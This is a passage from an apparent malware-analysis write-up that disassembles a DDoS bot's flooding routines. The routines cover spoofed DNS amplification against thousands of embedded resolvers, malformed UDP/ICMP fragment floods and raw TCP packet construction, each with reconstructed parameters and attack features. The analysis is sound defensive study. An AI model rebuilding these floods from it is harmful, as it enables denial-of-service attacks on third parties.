0x80492e2: idivl %ebx,%eax
This results in %eax effectively being divided by 0x1f40. The result
utilised from this process is %edx (the remainder). The purpose of
this operation appears to be solely for the remainer, in a form of MOD
operation. This would make a lot of sense if the previous function
was indeed random().
If 0xfffff9ac(%ebp) is not 1 (perhaps on following iterations), %edx
is set to 0.
At this point, %edx was either set to a random number 0-8000, or 0
depending upon 0xfffff9ac(%ebp) (initially set so %edx is random).
No matter what the last conditional worked out to be, it continues:
0x80492ea: cmpl $0x0,0x806d22c(,%edx,4)
0x80492f2: je 0x8049530
A long value at 0x806d22c with offset %edx is checked. If it is 0, it
jumps to 0x8049530, if not, we continue:
0x80492f8: leal 0x806d22c(,%edx,4),%edx
0x80492ff: movl %edx,0xfffff994(%ebp)
Once again, we use this offset by %edx, this time to put a memory
address into 0xfffff994(%ebp). We then use this address:
0x8049308: movl 0xfffff994(%ebp),%ebx
0x804930e: movl (%ebx),%eax
0x8049310: movl %eax,0xfffffddc(%ebp)
0x8049316: movl 0xfffff990(%ebp),%ebx
To extract the value from that memory location and put it into
0xfffffddc(%ebp). %ebx is then set to the value at 0xfffff990(%ebp)
0x804931c: leal 0xfffffde8(%ebp,%ebx,1),%edx
0x8049323: movl 0xffffffdc(%ebp,%edi,4),%eax
0x8049327: pushl %eax
0x8049328: pushl %edx
0x8049329: movl 0xfffff9a0(%ebp),%ebx
0x804932f: pushl %ebx
0x8049330: call 0x805652c
A function call to 0x805652c is setup and executed. The function is not
known, but in looking at the contents, a memory copy loop is formed such
that the above stack setup would result in *0xffffffdc(%ebp,%edi,4)
bytes being copied from 0xfffffde8(%ebp,%ebx,1) to 0xfffff9a0(%ebp).
Assuming %edi never exceeds 8, *0xffffffdc(%ebp,%edi,4) would always
point to one of the following values: 21,21,20,21,21,25,20,20,20 which
were placed into the buffer earlier.
0xfffffde8(%ebp,%ebx,1) follows an identical behaviour.
0xfffffde8(%ebp) was earlier setup as a 500 byte copy of preset data.
Using %ebx as an index, the amount of data specified is copied to a
memory location specified at 0xfffff9a0(%ebp). This was earlier set to:
0x80491e3: leal 0xfffff9e4(%ebp),%ebx
0x80491e9: movl %ebx,0xfffff9a0(%ebp)
A look back at suspicions about this whole section:
0xfffff9e4(%ebp) = X + 20 + 8
If this was indeed a setup for a UDP IP packet, this data copy would fit
in EXACTLY to form the data component of the packet.
More randomising code:
0x8049338: call 0x8055e38
0x804933d: movl $0xff,%ebx
0x8049342: cltd
0x8049343: idivl %ebx,%eax
%edx is now presumed to be a random number 0 to 0xff. It's then stored:
0x8049345: movl 0xfffff9a0(%ebp),%ebx
0x804934b: movb %dl,(%ebx)
A byte of this remainder(should be <255 anyway) replaces the first byte
of this data component, and oddly enough, the process is repeated to see
the second byte also replaced:
0x8049360: movb %dl,0x1(%ebx)
0x1c(%ebp) and 0x20(%ebp) are then checked. These variables match up to
be LongE and LongF.
If LongE and LongF are both 0, we do another random() call with:
0x8049374: movl $0x7530,%ebx
0x804937a: idivl %ebx,%eax
0x804937c: movl %edx,%eax
Resulting in %eax being some random number 0 to 0x7530.
If either LongE or LongF are non-zero:
0x8049380: movl 0x1c(%ebp),%eax
0x8049383: shll $0x8,%eax
0x8049386: addw 0x20(%ebp),%ax
The low-order end of %eax is filled such that LongE forms %ah.
At this point, %eax is filled with either a random number up to 0x7530,
or a value represented by LongE and LongF.
Whatever the outcome:
0x804938a: xchgb %al,%ah
The two bytes are exchanged (possibly a crude/optimised form of
htons()?).
Some more of the 'believed packet' is constructed:
0x804938c: movl 0xfffff9a4(%ebp),%ebx
0x8049392: movw %ax,(%ebx)
0x8049395: movl 0xfffff9a4(%ebp),%ebx
0x804939b: movw $0x3500,0x2(%ebx)
0x80493a1: movw 0xffffffdc(%ebp,%edi,4),%ax
0x80493a6: addw $0x8,%ax
0x80493aa: xchgb %al,%ah
0x80493ac: movw %ax,0x4(%ebx)
The exchanged bytes are put into place at what would correspond to the
UDP header's source port (definately explains the exchange). 2 bytes
after this (the destination port), 0x3500 is positioned. 0x3500
corresponds to a destination port of 53(DNS). 0x4(%ebx) will correspond
to the udp length, and is set to 0x8(udp header length) plus an indexed
value starting at 0xffffffdc(%ebp). This starting point saw 9 values
between 20 and 25 placed in and after it.
0x80493b0: movw $0x0,0x6(%ebx)
0x80493b6: cmpl $0x0,0x24(%ebp)
0x80493ba: jne 0x80493ec
0x6(%ebx) would be the udp header checksum, and is set to 0. A value
corresponding to be LongG is then checked and if it is zero, some
copying takes place. The actual values will be LongA, LongB, LongC, and
LongD (See code at 0x8049180 to know why). They are placed into the
'packet buffer' positioned as the IP header source address. It should
be noted here that if LongG was non-zero, the earlier gethostbyname()
would have been called, and if successful, it would have filled in the
source IP address.
0x80493ec: movl 0xfffff994(%ebp),%ebx
0x80493f2: movl (%ebx),%eax
0x80493f4: movl %eax,0x10(%esi)
0x80493f7: movb $0x45,(%esi)
0xfffff994(%ebp) was earlier set as a pointer to some indexed data. The
long value from that memory location is then copied to 0x10(%esi). %esi
at this point should still be set to the beginning of the 'packet
buffer'. indexing 16bytes into that buffer is the destination IP
address. That indexed buffer must correspond to IP addresses?
[considering the index was a random 0 to 8000 this leads one to assume
theres either an error, or this binary contains 8000 IP addresses!?!?]
The moving of 0x45 (such an easily recognisable number!) is moved into
the first byte of the 'packet buffer'. This corresponds to an IP
version 4 packet, with a header length set to 5 (indicating 4*5 byte
header). There is now no doubt that this buffer is indeed for packet
construction.
0x80493fa: call 0x8055e38
0x80493ff: movl $0x82,%ebx
0x8049404: cltd
0x8049405: idivl %ebx,%eax
0x8049407: addb $0x78,%dl
0x804940a: movb %dl,0x8(%esi)
Once again, random + mod code, this time with a +0x78. This is inserted
into the IP TTL section (this explains the +0x78!). This ensures the
TTL is always set between 120 and 250.
Some more randomising code, modded by 255, followed by:
0x804941a: movw %dx,0x4(%esi)
0x804941e: movb $0x11,0x9(%esi)
0x8049422: movw $0x0,0x6(%esi)
This corresponds to the IP header ID being a random 0-255 number. The
0x11 goes into the IP protocol position (udp!) and the 0 goes into the
IP offset position.
0x8049428: movw 0xffffffdc(%ebp,%edi,4),%ax
0x804942d: addw $0x1c,%ax
0x8049431: xchgb %al,%ah
0x8049433: movw %ax,0x2(%esi)
0x8049437: movw $0x0,0xa(%esi)
The 0xffffffdc(%ebp,%edi,4) indexed value should still correspond to
that 9 number list (20-25). On top of the indexed number, 28 is added.
This is obviously related to ip header size + udp header size. The
low-order word result bytes are exchanged (effectively a htons()), and
this word put into none other than the total length field of the IP
header. 0 is put into the checksum field for the IP header.
This is followed by a long set of mathematical instructions that operate
on the packet data. No chances to the data are made until:
0x80494a9: movw %ax,0xa(%esi)
Where the result of all these operations is put into the checksum field
once again. It is assumed these operations are some form of inline
chksum function, or the blackhat author wrote the checksum code directly
into this function. (Note that the checksum has NOT been verified to
be correct!)
We then setup for a call:
0x80494ad: pushl $0x10
0x80494af: leal 0xfffffdd8(%ebp),%eax
0x80494b5: pushl %eax
0x80494b6: pushl $0x0
0x80494b8: movl 0xffffffdc(%ebp,%edi,4),%eax
0x80494bc: addl $0x1c,%eax
0x80494bf: pushl %eax
0x80494c0: leal 0xfffff9c8(%ebp),%eax
0x80494c6: pushl %eax
0x80494c7: movl 0xfffff9a8(%ebp),%ebx
0x80494cd: pushl %ebx
0x80494ce: call 0x8056c3c
The function is unknown, but it doesnt take long to work out what it is:
0x8056c69: movl $0xb,%edx
0x8056c71: movl $0x66,%eax
0x8056c76: movl %edx,%ebx
0x8056c78: int $0x80
Matching to a socketcall for SYS_SENDTO.
First parameter of 0xfffff9a8(%ebp) is indeed the socket returned by
socket() (see 0x8049218). Second matches with the 'packet buffer'. The
third is once again that indexed value plus 28. The fourth is 0, The
fifth is a pointer to 0xfffffdd8(%ebp) which in hindsight makes sense of
some earlier value assignments to form a sockaddr_in structure of
AF_INET type with port = 0 and the address was earlier (curiously) set
to the destination address. In construction of raw packets however,
this structure shouldn't have any effect. The final parameter is merely
the size of the sockaddr structure.
This should send the previously constructed packet off. Analysis of
this packet and its reasonings will be discussed in Network_Analysis_C.
Following the sendto:
0x80494d6: cmpl $0x0,0x18(%ebp)
0x80494da: jne 0x80494e8
0x80494dc: pushl $0x12c
0x80494e1: call 0x80555b0
0x80494e6: jmp 0x8049507
The check uses the NumberA parameter to this function. If it is 0, it
will call usleep(0x12c), and if not:
0x80494e8: movl 0x18(%ebp),%ebx
0x80494eb: cmpl %ebx,0xfffff99c(%ebp)
0x80494f1: jne 0x8049514
0x80494f3: pushl $0x12c
0x80494f8: call 0x80555b0
0x80494fd: movl $0x0,0xfffff99c(%ebp)
0x8049507: decl 0xfffff998(%ebp)
0xfffff99c(%ebp) was earlier set to 0. It compares it to NumberA, and
if it is equal to it, it will usleep(0x12c), and set 0xfffff99c(%ebp) to
0. It also decrements the variable at 0xfffff998(%ebp) which seems to
be related to the gethostbyname() section.
If NumberA was not equal to 0xfffff99c(%ebp), it increments
0xfffff99c(%ebp) by 1.
Now comes the interesting part:
0x804951a: addl $0x4,0xfffff994(%ebp)
0x8049521: movl 0xfffff994(%ebp),%ebx
0x8049527: cmpl $0x0,(%ebx)
0x804952a: jne 0x8049308
0xfffff994(%ebp) is used as a pointer to IP addresses, by incrementing
it by 4, this moves it onto the next address. The space where the ip
address is supposed to be is checked to be 0 (indicator of the end of
the list one would assume). If it is not, it jumps back up to 0x8049308
and resends another packet. It repeats this until it hits that null.
Upon reaching the null:
0x8049530: addl $0x32,0xfffff990(%ebp)
0x8049537: incl %edi
0x8049538: cmpl $0x8,%edi
0x804953b: jle 0x80492c4
0x8049541: jmp 0x8049250
0xfffff990(%ebp) is incremented by 50. This is the pointer to the
packet data which, upon analysis of the actual indexed data, appears to
start again every 50 bytes (with slight differences). %edi is the index
for what appears to be the data sizes which will go up to, but not
including 9. There then appears to be a jump back up to 0x8049250 which
sees to the reset of all the indexes and pointers and restart the
process again.
It should be noted that there does not appear to be any exit condition,
making one assume that this function will continue until the process is
killed.
Disassembly Review:
A long and complex function. It consists primarily of two loops, one
which appears to loop through data types which start at 0x80676bc, and
another within it that loops through IP addresses which start at
0x806d22c. There appears to be timing considerations included in the
code, possibly to alter the speed at which an infected machine will send
packets out at. One cannot be sure how many packets per second would be
sent without a live test.
In reconstructing the function call:
Network_Function_B(IPOctet1, IPOctet2, IPOctet3, IPOctet4,
FloodSpeed, PortOctet1, PortOctet2, DNSFlag, Hostname)
If DNSFlag is 0, the IPOctets are used as the source address for the
outgoing packets. If it is non-zero, it will attempt to resolve
Hostname. 0xfffff998(%ebp) is also utilised in such a way that it will
try to re-resolve the hostname every 40000 usleep()'s (not necessarily
every X packets).
Function Overview:
A very nasty function. It appears to be a form of 'packetting'
function. The interesting thing about it is it specifies the source IP,
and the destinations are all preset within the binary - at least 8000 of
them!! [It turns out theres over 11,000 of them - See Appendix A]
With analysing the network traffic (will be done in Network_Analysis_C),
one can already see that packets are sent off to DNS servers on a dns
port. The source IP and source port are both able to be set by the
blackhat through his/her own communications channel. The actual attack
is undoubtedly a form of amplification attack.
Some easily seen 'features' of this attack:
* Can attack a single victim
* Attack can be done via hostname - on the attacking machine
* DNS lookups are done occasionally and the IP address updated
* The attack is scalable on a packets-per-second basis
* Attack has no timeout
* 9 different dns requests are used
e) Network_Function_C [0x80499f4] - (Network)
Known Usage:
function(*0xfffff002(%ebp), *0xfffff003(%ebp), *0xfffff004(%ebp),
*0xfffff005(%ebp), *0xfffff006(%ebp), *0xfffff007(%ebp),
*0xfffff008(%ebp), *0xfffff009(%ebp), *0xfffff00a(%ebp),
*0xfffff00b(%ebp), *0xfffff00c(%ebp), 0xffffbb44(%ebp))
Guesses at purpose:
Possibly another sort of packetting function like Network_Function_B.
Naming Conventions:
Parameters will be given the following names:
function(LongA, LongB, LongC, LongD, LongE, LongF,
LongG, LongH, LongI, LongJ, LongK, BufferA)
Disassembly:
The function starts with a much smaller local stack size than the
previous function:
0x80499f7: subl $0xa0,%esp
This is followed by copying of the parameters to localised variables,
and:
0x8049a3c: movw $0x2,0xfffffff0(%ebp)
0x8049a42: call 0x8055e38
First is a simple assignment, next is a call to what was earlier
believed to be random().
0x8049a47: movl $0xff,%ecx
0x8049a4c: cltd
0x8049a4d: idivl %ecx,%eax
0x8049a4f: movl %edx,%eax
0x8049a51: xchgb %al,%ah
0x8049a53: movw %ax,0xfffffff2(%ebp)
The result goes through the now familiar MOD'ing process, is xchg()'d in
what is probably a way of htons()'ing the number, and is finally stored
at 0xfffffff2(%ebp). This is two bytes after the previous 2 was moved
into at 0x8049a3c.
We then setup for a function call:
0x8049a57: movzbl %bl,%eax
0x8049a5a: pushl %eax
0x8049a5b: movzbl 0xffffff6c(%ebp),%eax
0x8049a62: pushl %eax
0x8049a63: movzbl 0xffffff70(%ebp),%eax
0x8049a6a: pushl %eax
0x8049a6b: movzbl 0xffffff74(%ebp),%eax
0x8049a72: pushl %eax
0x8049a73: pushl $0x806768a
0x8049a78: leal 0xffffff90(%ebp),%esi
0x8049a7b: pushl %esi
0x8049a7c: call 0x804f808
(gdb) x/1s 0x806768a
0x806768a: "%d.%d.%d.%d"
This function has been identified as sprintf(), so the call looks like:
sprintf(0xffffff90(%ebp), "%d.%d.%d.%d", *0xffffff74(%ebp),
*0xffffff70(%ebp), *0xffffff6c(%ebp), *bl)
When looking back at %bl, we soon see that all these addresses are
actually the local copies of the parameters, so:
sprintf(0xffffff90(%ebp), "%d.%d.%d.%d", LongG, LongH, LongI, LongJ)
One can immediately assume LongG-J are IP octets.
Conditional:
0x8049a84: cmpl $0x0,0x30(%ebp)
0x8049a88: jne 0x8049abe
0x30(%ebp) corresponds to LongK. If LongK is 0:
We setup for another call:
0x8049a8a: movzbl 0xffffff78(%ebp),%eax
0x8049a91: pushl %eax
0x8049a92: movzbl 0xffffff7c(%ebp),%eax
0x8049a99: pushl %eax
0x8049a9a: movzbl 0xffffff80(%ebp),%eax
0x8049a9e: pushl %eax
0x8049a9f: movzbl 0xffffff84(%ebp),%eax
0x8049aa3: pushl %eax
0x8049aa4: pushl $0x806768a
0x8049aa9: leal 0xffffffb0(%ebp),%ebx
0x8049aac: pushl %ebx
0x8049aad: call 0x804f808
Once again, another sprintf, similar to the first:
sprintf(0xffffffb0(%ebp), "%d.%d.%d.%d", LongC, LongD, LongE, LongF)
One can now assume LongC-F are also IP octets. %ebx is then pushed
back onto the stack:
0x8049ab2: pushl %ebx
0x8049ab3: call 0x804ce8c
0x804ce8c is unidentified, so we analyse it and see:
0x804ce9a: call 0x804ceb4
This is the only real action in that part, however this call is also
unidentified. Looking into this code, it appears to use the parameter
as a pointer, and is comprised of a main loop. This main loop appears
to scan through looking for 0x2e('.'). There are many checks done on
the buffer including for 0x30,0x78, aka "0x". This instantly makes
one look at the source code for inet_aton() which seems to closely
(not precisely - at least not the version i looked at) to the
disassembly. This also only explains the code at 0x804ceb4. The code
at 0x804ce8c can be easily explained by looking at the code to
inet_addr(). It matches precisely (to the source code i reviewed).
As such the code at 0x804ce8c will now be known as inet_addr, and the
code at 0x804ceb4 as inet_aton.
Upon function completion the return value is stored:
0x8049ab8: movl %eax,0xfffffff4(%ebp)
Regardless of LongK's earlier value, another function call is then setup
and launched:
0x8049abe: pushl $0xff
0x8049ac3: pushl $0x3
0x8049ac5: pushl $0x2
0x8049ac7: call 0x8056cf4
This one is a lot easier, and has already been identified as socket().
This corresponds to:
socket(AF_INET, SOCK_RAW, IPPROTO_RAW)
The socket descriptor is place into the stack:
0x8049acc: movl %eax,0xffffff68(%ebp)
0x8049ad5: testl %eax,%eax
0x8049ad7: jle 0x8049d24
The code will continue if the socket() call was successful:
0x8049add: movb $0x45,0xffffffd0(%ebp)
0x8049ae1: movw $0x1c28,0xffffffd2(%ebp)
0x8049ae7: movw $0x5504,0xffffffd4(%ebp)
0x8049aed: call 0x8055e38
0x8049af2: movl $0x82,%ecx
0x8049af7: cltd
0x8049af8: idivl %ecx,%eax
0x8049afa: addb $0x78,%dl
0x8049afd: movb %dl,0xffffffd8(%ebp)
Once again, the very noticable value (to all packet watchers) of 0x45 is
seen which immediately raises the suspicion that another packet buffer
is being constructed (like in Network_Function_B). If assuming this to
be the case, 0xffffffd0(%ebp) would be the start of the IP header.
In keeping with this idea, the 0x1c28 would be placed into IP header
total length field. This should be htons()'d, as such the total length
would be 10268 bytes. The next value is 0x5504 and is placed into the
IP ID field. This corresponds to an ID of 1109. The call is to
random() in the famous MOD'ing routing, this time ending in a MOD 130.
An additional 0x78(120) is also added. This number is stored in the IP
TTL field. This basically means a random TTL will be used between 120
and 250.
0x8049b00: pushl %esi
0x8049b01: call 0x804ce8c
0x8049b06: movl %eax,0xffffffdc(%ebp)
0x8049b09: addl $0x4,%esp
0x8049b0c: cmpl $0x0,0x30(%ebp)
0x8049b10: jne 0x8049b21
The first call is to inet_addr, and %esi is still assigned from the
first sprintf() earlier. The result is placed into 0xffffffdc(%ebp)
which corresponds to the source IP address. 0x30(%ebp) is matched to
LongK. If it is 0:
0x8049b12: leal 0xffffffb0(%ebp),%eax
0x8049b15: pushl %eax
0x8049b16: call 0x804ce8c
0x8049b1b: movl %eax,0xffffffe0(%ebp)
Once again, an inet_addr() call, using 0xffffffb0(%ebp). This address
matches up with the destination buffer for the second sprintf() call
earlier. The return value is placed into what would correspond to be
the destination IP address.
Back to non-conditional code:
0x8049b21: movw $0xfe1f,0xffffffd6(%ebp)
0x8049b27: movw $0x0,0xffffffda(%ebp)
0x8049b2d: cmpl $0x0,0x8(%ebp)
0x8049b31: je 0x8049bb0
The 0xfe1f (8190) will be placed into the IP offset position. LongA is
then checked:
If it is non-zero:
0x8049b33: movb $0x11,0xffffffd9(%ebp)
The value of 17 is placed into the IP protocol field of the packet
buffer, this makes it a UDP packet.
0x8049b48: movw %ax,0xffffffe4(%ebp)
A random number is generated, MOD 255'd, and xchg'd. The result is
placed into 0xffffffe4(%ebp) which would correspond to the beginning
of the UDP header, the source port.
0x8049b4c: movw 0xc(%ebp),%ax
0x8049b50: xchgb %al,%ah
0x8049b52: movw %ax,0xffffffe6(%ebp)
0x8049b56: movw $0x900,0xffffffe8(%ebp)
0xc(%ebp) is LongB, and is xchg'd then placed into 0xffffffe6(%ebp).
This corresponds to the UDP destination port. 0x900 is put into
0xffffffe8(%ebp), the UDP length field (9 bytes).
This is followed by a whole set of mathematical code, one which when
compared to the checksum code in Network_Function_B, matches. The
part of importance:
0x8049ba4: movw %ax,0xffffffea(%ebp)
This is where the result is placed into 0xffffffea(%ebp) which is the
UDP checksum. Once again, the checksum code has not been analysed to
be correct, and it may return a wrong result!
0x8049ba8: movb $0x61,0xffffffec(%ebp)
0x8049bac: jmp 0x8049c10
Finally, a value of 0x61 is placed into 0xffffffec(%ebp) which would
mark the start of the UDP data.
If the earlier check of LongA shows it to be 0:
0x8049bb0: movb $0x1,0xffffffd9(%ebp)
0x8049bb4: movb $0x8,0xffffffe4(%ebp)
0x8049bb8: movb $0x0,0xffffffe5(%ebp)
0x8049bbc: movw $0x0,0xffffffe6(%ebp)
The IP protocol is set to 1 (ICMP). ICMP header is assumed to follow
after a 20 byte IP header, in which case the ICMP type is set to 8
(ICMP_ECHO), the code is set to 0 (not used for ICMP echo), and the
checksum is set to 0. This is followed by the now recognisable
checksumming code ending in:
0x8049c0c: movw %ax,0xffffffe6(%ebp)
Which replaces the checksum with the determined value.
Ending the LongA conditionals:
0x8049c10: movl $0x1d,0xffffff64(%ebp)
Some variable is set to 29.
What follows is yet more checksum code, ending in:
0x8049c64: movw %ax,0xffffffda(%ebp)
0xffffffda(%ebp) corresponds to the IP checksum field.
0x8049c6a: leal 0xfffffff0(%ebp),%ecx
0x8049c6d: movl %ecx,0xffffff60(%ebp)
0xfffffff0(%ebp) was earlier set to 2 at 0x8049a3c.
0x8049c73: leal 0xffffffd0(%ebp),%edi
%edi is loaded with 0xffffffd0(%ebp) which is the start of the 'packet
buffer'.
Comparisons are done:
0x8049c7a: cmpl $0x0,0x30(%ebp)
0x8049c7e: je 0x8049cce
0x8049c80: testl %ebx,%ebx
0x8049c82: jg 0x8049cce
0x30(%ebp) is referenced to LongK, and %ebx was set to 0 earlier
(initially). If both LongK and %ebx are non-zero, we continue:
0x8049c84: movl 0x34(%ebp),%ecx
0x8049c87: pushl %ecx
0x8049c88: call 0x804bf80
0x34(%ebp) is referenced to BufferA, and 0x804bf80 is believed to be
gethostbyname() code. Fairly self-explanatory.
0x8049c8d: movl %eax,%edx
0x8049c92: testl %edx,%edx
0x8049c94: jne 0x8049cac
Result is checked (for failure of gethostbyname), if it failed:
0x8049c96: pushl $0x258
0x8049c9b: call 0x80556cc
0x8049ca0: movl $0x1,%esi
0x8049ca8: jmp 0x8049cce
First is a reference to sleep(0x258). %esi is believed to be used as a
variable at the moment, and is set to 1. A jump is in place, indicating
the earlier gethostbyname() check was an if-then-else. If the function
succeeded (in resolving the hostname in BufferA):
0x8049cac: pushl $0x4
0x8049cae: leal 0xffffff88(%ebp),%eax
0x8049cb1: pushl %eax
0x8049cb2: movl 0x10(%edx),%eax
0x8049cb5: movl (%eax),%eax
0x8049cb7: pushl %eax
0x8049cb8: call 0x8056480
Once again, we see the Misc_Data_Copy() function used in the same
method as seen before. 4 bytes are copied from 0x10(%edx) to
0xffffff88(%ebp). %edx is a returned pointer to a hostent structure.
0x10(%edx) would be the first resolved IP address of the hostname.
Effectively the 4 bytes of this IP address are copied into
0xffffff88(%ebp).
Continuing:
0x8049cbd: movl 0xffffff88(%ebp),%eax
0x8049cc0: movl %eax,0xffffffe0(%ebp)
0x8049cc3: movl %eax,0xfffffff4(%ebp)
0x8049cc6: movl $0x9c40,%ebx
0x8049cce: testl %esi,%esi
0x8049cd0: jne 0x8049d1d
0xffffff88(%ebp) will now be copied into 0xffffffe0(%ebp) which
is the destination IP address in the packet buffer. 0xfffffff4(%ebp) is
unknown. %ebx was used earlier to determine if gethostbyname() should
even be called. It is used identical to Network_Function_B as a way of
having gethostbyname() called after every X seconds(/minutes/hours).
%esi is used to keep track of gethostbyname failures. If gethostbyname
isn't even called, it should be 0. If it is called and is successful,
it should be 0, but if it was called and failed, it was set to 1 (see
0x8049ca0).
As such, if either it was not called, or it was called and succeeded:
0x8049cd2: pushl $0x10
0x8049cd4: movl 0xffffff60(%ebp),%ecx
0x8049cda: pushl %ecx
0x8049cdb: pushl $0x0
0x8049cdd: movl 0xffffff64(%ebp),%ecx
0x8049ce3: pushl %ecx
0x8049ce4: pushl %edi
0x8049ce5: movl 0xffffff68(%ebp),%ecx
0x8049ceb: pushl %ecx
0x8049cec: call 0x8056c3c
A quick look to see what %edi was:
0x8049c73: leal 0xffffffd0(%ebp),%edi
And the sendto() call looks like this:
sendto(*0xffffff68(%ebp), 0xffffffd0(%ebp), *0xffffff64(%ebp),0
*0xffffff60(%ebp), 0x10)
Looking at what each of these are, *0xffffff68(%ebp) should still be the
socket descriptor set at 0x8049acc. 0xffffffd0(%ebp) is the now well
known packet buffer for this function. *0xffffff64(%ebp) was earlier
set to 0x1d and is believed not to change. 0xffffff60(%ebp) is a
sockaddr structure, which when looking back has been set up with
values for family=AF_INET, port=random, and address=destination ip.
The sendto call is then set up and repeated again.
After this:
0x8049d13: pushl $0x14
0x8049d15: call 0x80555b0
Believed to be a usleep(20). This is followed by:
0x8049d1d: decl %ebx
0x8049d1e: jmp 0x8049c78
Just a reminder, that %ebx acts as a count-down. When it reaches 0, the
process will gethostbyname() the string in BufferA and reset %ebx to
40000. The process then jumps back up to 0x8049c78, in what looks to be
a process of simply checking the hostname, update IP (if it is time),
and continue sending packets!
Disassembly Review:
Network_Function_C is a lot more simple than Network_Function_B. It
appears to simply use the parameters to generate a packet buffer, and
forms a loop to continuously send packets. A solitary usleep(20) for
every 2 packets sent should rate limit the output to a constant.
LongA seems to be used to identify a icmp or udp packet (0 = ICMP,
anything else = UDP). LongB is used to set the packet destination port
(UDP only). LongC-F are used as the destination IP octets, and LongG-J
are used as the source octets. LongK is used to identify whether the
process should use the LongC-F octets, or if it should use an expected
hostname in BufferA.
Function Overview:
A strange function, with strange packet production - analysis of which
will be left for Network_Analysis_D. The outcome of this function will
be a flood of 29 byte udp or icmp packets. Very small, however the
packet header contains an IP offset of 8190, along with an IP size field
of 10268 bytes.
It's possible the author made 'several' mistakes when coding this
function, but given the good-coding of Network_Function_B, it may all be
intentional. The outcome of these packets is unknown, but will
certainly be examined in Network_Analysis_D.
Features of this attack:
* Single victim
* Victim may be hostname-based
* Hostname can be re-looked up every 80000 packets(2.2MB)!
* Packet stream should be constant(except during dns lookups)
* Content can be UDP or ICMP
* Packets should be errors.
f) Network_Function_D [0x8049d40] - (Network)
Known Usage:
function(*0xfffff002(%ebp), *0xfffff003(%ebp), *0xfffff004(%ebp),
*0xfffff005(%ebp), *0xfffff006(%ebp), *0xfffff007(%ebp),
*0xfffff008(%ebp), *0xfffff009(%ebp), *0xfffff00a(%ebp),
*0xfffff00b(%ebp), *0xfffff00c(%ebp), *0xfffff00d(%ebp),
*0xfffff00e(%ebp), 0xffffbb44(%ebp))
Guesses at purpose:
Possibly another packetting function like network functions B and C
Naming Conventions:
Parameters will be given the following names:
function(LongA, LongB, LongC, LongD, LongE, LongF, LongG, LongH,
LongI, LongJ, LongK, LongL, LongM, BufferA)
Disassembly:
This function starts off just like the previous, with copying of
function parameters into local variables. One of the first things of
interest to occur:
0x8049d94: cmpl $0x0,0x34(%ebp)
0x8049d98: je 0x8049d9d
0x8049d9a: decl 0x34(%ebp)
0x34(%ebp) is LongL. If it is non-zero, it is decremented.
This is followed by:
0x8049d9d: pushl $0x0
0x8049d9f: call 0x8057444
Which matches to a time(0) call, the result of which:
0x8049da7: pushl %eax
0x8049da8: call 0x80559a0
Is passed to an srandom() call.
0x8049db0: movw $0x2,0xfffffff0(%ebp)
0x8049db6: call 0x8055e38
2 is put into a variable, and is followed by a call to random(). The
result goes through the now expected MOD routine, this time by 255, and
the outcome chg()'d then placed into 0xfffffff2(%ebp).
0x8049dcb: cmpl $0x0,0x38(%ebp)
0x8049dcf: jne 0x8049e0b
0x38(%ebp) matches up with LongM. If LongM is 0:
0x8049dd1: movzbl 0xffffff38(%ebp),%eax
0x8049dd8: pushl %eax
0x8049dd9: movzbl 0xffffff54(%ebp),%eax
0x8049de0: pushl %eax
0x8049de1: movzbl 0xffffff58(%ebp),%eax
0x8049de8: pushl %eax
0x8049de9: movzbl 0xffffff5c(%ebp),%eax
0x8049df0: pushl %eax
0x8049df1: pushl $0x806768a
0x8049df6: leal 0xffffff88(%ebp),%ebx
0x8049df9: pushl %ebx
0x8049dfa: call 0x804f808
This is an sprintf call, and one that has been seen before. The pushl's
all correspond to the localised versions of the function parameters. It
effectively attempts to form a dotted quad address at 0xffffff88(%ebp)
using LongA, LongB, LongC, and LongD as the octets. With this:
0x8049dff: pushl %ebx
0x8049e00: call 0x804ce8c
0x8049e05: movl %eax,0xfffffff4(%ebp)
inet_addr() is called and the result placed into 0xfffffff4(%ebp).
0x8049e0b: movb $0x45,0xffffffc8(%ebp)
0x8049e0f: movw $0x2800,0xffffffca(%ebp)
0x8049e15: movb $0x0,0xffffffc9(%ebp)
Once again, the well-known 0x45. Assuming this corresponds to the ihl
and version of an IP header, the packet buffer would start at
0xffffffc8(%ebp). As such, 0xffffffca(%ebp) should be the length field
of the IP header (in network byte order). 0xffffffc9(%ebp) would be the
TOS field.
A function is setup and called:
0x8049e19: pushl $0xff
0x8049e1e: pushl $0x3
0x8049e20: pushl $0x2
0x8049e22: call 0x8056cf4
A simple socket() call, no different to what was seen in earlier
functions:
socket(AF_INET, SOCK_RAW, IPPROTO_RAW)
Socket descriptor is placed into a variable:
0x8049e27: movl %eax,0xffffff40(%ebp)
0x8049e30: testl %eax,%eax
0x8049e32: jle 0x804a178
And is then checked to ensure it is greater than 0. If so:
0x8049e38: cmpl $0x0,0x20(%ebp)
0x8049e3c: je 0x8049e72
0x20(%ebp) is checked. This corresponds to LongG. If it is non-zero:
0x8049e3e: movzbl 0xffffff44(%ebp),%eax
0x8049e45: pushl %eax
0x8049e46: movzbl 0xffffff48(%ebp),%eax
0x8049e4d: pushl %eax
0x8049e4e: movzbl 0xffffff4c(%ebp),%eax
0x8049e55: pushl %eax
0x8049e56: movzbl 0xffffff50(%ebp),%eax
0x8049e5d: pushl %eax
0x8049e5e: pushl $0x806768a
0x8049e63: leal 0xffffff68(%ebp),%eax
0x8049e69: pushl %eax
0x8049e6a: call 0x804f808
An sprintf is setup and called, once again to form a dotted quad using
parameters passed to the function (LongH,LongI,LongJ,LongK).
0x8049e72: cmpl $0x0,0x38(%ebp)
0x8049e76: jne 0x8049e87
LongM is checked, and if it is non-zero:
0x8049e78: leal 0xffffff88(%ebp),%eax
0x8049e7b: pushl %eax
0x8049e7c: call 0x804ce8c
0x8049e81: movl %eax,0xffffffd8(%ebp)
*0xffffff88(%ebp) is passed to inet_addr(). This was set up earlier in
an sprintf(the first one) to be a dotted quad of LongA-D.
The result of the inet_addr() is placed into 0xffffffd8(%ebp), which
should correspond to a destination IP of the packet buffer that appears
to be under construction.
Some more packet buffer setup:
0x8049e87: movw $0x0,0xffffffce(%ebp)
0x8049e8d: movb $0x6,0xffffffd1(%ebp)
The 0 is placed into the IP offset field.
The 6 is placed into the IP protocol field, indicating a TCP packet.
Assuming a 20 byte IP header as indicated by the ihl, the TCP packet
buffer should start at 0xffffffdb(%ebp).
0x8049e91: movb 0xffffffe9(%ebp),%al
0x8049e94: andb $0xef,%al
0x8049e96: movb %al,0xffffffe9(%ebp)
0x8049e99: movb 0xffffffe8(%ebp),%al
0x8049e9c: andb $0xf,%al
0x8049e9e: orb $0x50,%al
0x8049ea0: movb %al,0xffffffe8(%ebp)
These lines appear to do logical operations on byte values starting
